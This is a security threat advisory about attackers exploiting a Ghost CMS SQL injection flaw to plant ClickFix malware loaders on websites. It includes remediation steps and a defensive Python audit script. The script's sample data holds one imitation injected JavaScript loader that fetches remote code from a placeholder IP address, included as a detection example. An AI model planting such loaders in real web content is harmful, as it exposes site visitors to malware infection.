Attackers are exploiting a critical vulnerability, tracked as CVE-2026-26980, in the Ghost Content Management System (CMS) to compromise more than 700 legitimate websites. Read this Cybersecurity Threat Advisory to reduce risk for you and your clients.
What is the threat?
CVE-2026-26980 is a critical SQL injection vulnerability in Ghost CMS’s Content API, with a CVSS score of 9.4. Attackers are exploiting this flaw to extract Admin API keys and inject malicious JavaScript into published content, enabling large-scale ClickFix attacks.
Although Ghost patched the issue in version 6.19.1 in February 2026, unpatched systems remain exposed. The injected loader retrieves a flexible second-stage payload that fingerprints visitors and can redirect them, trigger downloads, or display fake Cloudflare CAPTCHA pages.
Because the lure is served from a trusted domain, victims are more readily tricked into executing a Windows command that drops DLL loaders, JavaScript droppers, and an Electron-based infostealer (UtilifySetup.exe). Code-signed DLLs further help the malware evade endpoint detection.
Why is it noteworthy?
This incident is significant because it affects Ghost, a widely used open-source CMS with more than 100,000 active deployments, including high-profile organizations such as DuckDuckGo, Harvard, and Oxford.
A critical SQL injection flaw in a platform of this scale allows unauthenticated attackers to compromise large numbers of trusted websites. At least two threat groups are actively exploiting the vulnerability—and competing to implant their own payloads—demonstrating both the severity of the flaw and the speed at which attackers weaponize newly disclosed vulnerabilities.
What is the exposure or risk?
The primary risk is twofold: data compromise and content hijacking. Attackers can exploit the SQL injection flaw to extract sensitive data from Ghost databases, including authentication tokens, user credentials, and Admin API keys. With these keys, they can programmatically alter site content and inject malicious loaders, putting visitors at risk of malware infection and downstream compromise.
More than 700 sites have already been compromised, and many remain unresponsive to notification efforts. This creates ongoing risk for both site operators and users, including reputational damage, loss of trust, and abuse of legitimate domains as malware distribution channels.
What are the recommendations?
Barracuda strongly recommends organizations take the following steps to reduce the risk of exploitation and protect critical infrastructure from this and other similar threats.
- Upgrade Ghost CMS to v6.19.1 or later on all instances.
- Ensure all plugins, themes, and dependencies are updated.
- Regenerate Admin API keys and Content API keys only after the upgrade is in place; rotating them on a still-vulnerable instance just lets attackers extract the new ones through the same flaw.
- Reset admin and user passwords.
- Invalidate and re-issue all tokens and sessions used by Ghost.
- Review posts, pages, and templates for unexpected JavaScript or HTML.
- Inspect Admin/API logs for unusual access, IPs, or activity.
- Look for ClickFix-related or unknown JS loaders embedded in content.
- Restrict database access and use least-privilege DB accounts.
- Limit admin access with VPN, IP allow lists, or strong MFA.
- Disable or lock down unnecessary APIs and integrations.
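The version check and the content review in the list above are the two items that lend themselves to a repeatable script. The Python below is an added example written for this advisory, not Barracuda's or Ghost's own code. It assumes only what the advisory states (the fix shipped in 6.19.1) plus Ghost's real Content API endpoint and response shape (`/ghost/api/content/posts/?key=…`, returning `{"posts": [...]}`); the sample posts, the allow-listed host, and the `fetch_posts` helper's query parameters are the author's own and should be adjusted to the site being audited. Inline scripts are reported for review rather than treated as proof of compromise, since Ghost's HTML card can legitimately carry embeds.

```python
"""Audit helpers for two of the Ghost recommendations above.

Added example (not Barracuda's or Ghost's code). Assumptions:
  - the fixed release is 6.19.1, as the advisory states;
  - the operator knows which script hosts the theme legitimately loads
    (ALLOWED_HOSTS below is a placeholder to edit);
  - post HTML is read from Ghost's Content API, whose JSON shape
    {"posts": [{"slug": ..., "html": ...}]} is real, but SAMPLE_POSTS
    is constructed data for this demonstration.
"""
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
from urllib.request import urlopen

PATCHED_VERSION = (6, 19, 1)   # first fixed release, per the advisory


def parse_version(version: str) -> tuple:
    """Turn '6.19.1' (or 'v6.19.1-rc.1') into a comparable tuple of ints."""
    core = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not core:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in core.groups())


def is_patched(version: str) -> bool:
    """True when the running Ghost is at or above the fixed release."""
    return parse_version(version) >= PATCHED_VERSION


class _ScriptCollector(HTMLParser):
    """Collect every <script> in a fragment as (src or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._current_src = None
        self._inline = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._current_src = dict(attrs).get("src")
            self._inline = []

    def handle_data(self, data):
        if self._in_script:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._current_src, "".join(self._inline).strip()))
            self._in_script = False


def find_unexpected_scripts(html: str, allowed_hosts: set) -> list:
    """Report scripts not loaded from an allow-listed host.

    Inline scripts are always reported for review: an injected loader is
    typically inline, although legitimate embeds can be too. Protocol-relative
    (//host/x.js) and relative (/x.js) sources are also reported.
    """
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src is None:
            findings.append({"kind": "inline", "preview": body[:80]})
            continue
        host = urlparse(src).hostname
        if host is None or host.lower() not in allowed_hosts:
            findings.append({"kind": "external", "src": src})
    return findings


def audit_posts(posts: list, allowed_hosts: set) -> dict:
    """Map post slug -> findings, omitting posts with nothing to report."""
    report = {}
    for post in posts:
        findings = find_unexpected_scripts(post.get("html") or "", allowed_hosts)
        if findings:
            report[post["slug"]] = findings
    return report


def fetch_posts(base_url: str, content_key: str) -> list:
    """Pull all posts from a live Ghost Content API (network call; not run here).

    The endpoint and the 'key' parameter are Ghost's real Content API; the
    limit/formats/fields parameters are the author's choice for this audit.
    """
    url = (f"{base_url.rstrip('/')}/ghost/api/content/posts/"
           f"?key={content_key}&limit=all&formats=html&fields=slug,html")
    with urlopen(url, timeout=30) as resp:
        return json.load(resp)["posts"]


# Constructed sample posts (not real Ghost data) for the demonstration.
SAMPLE_POSTS = [
    {"slug": "welcome",
     "html": '<p>Hello</p><script src="https://cdn.example.com/embed.js"></script>'},
    {"slug": "quarterly-update",
     "html": "<p>Results</p><script>(function(){var s=document.createElement('script');"
             "s.src='https://203.0.113.10/l.js';document.head.appendChild(s)})();</script>"},
    {"slug": "plain", "html": "<h2>Just text</h2><p>No scripts here.</p>"},
]
ALLOWED_HOSTS = {"cdn.example.com"}   # placeholder: hosts your theme really loads from

if __name__ == "__main__":
    print("patched:", is_patched("6.19.1"))
    print(json.dumps(audit_posts(SAMPLE_POSTS, ALLOWED_HOSTS), indent=2))
```

Run it against the live site by replacing `SAMPLE_POSTS` with `fetch_posts("https://your-site.example", "<content api key>")`; anything the report lists should be compared with the post's revision history in Ghost Admin before being removed, and a flagged post is a reason to go back to the key-rotation and log-review steps above.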
References
For more in-depth information about the recommendations, please visit the following links:
- https://thehackernews.com/2026/05/ghost-cms-cve-2026-26980-exploited-to.html
- https://www.securityweek.com/ghost-cms-vulnerability-exploited-to-hack-over-700-websites/amp/
- https://cybelangel.com/blog/cve-2026-26980-ghost-cms-flaw/
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.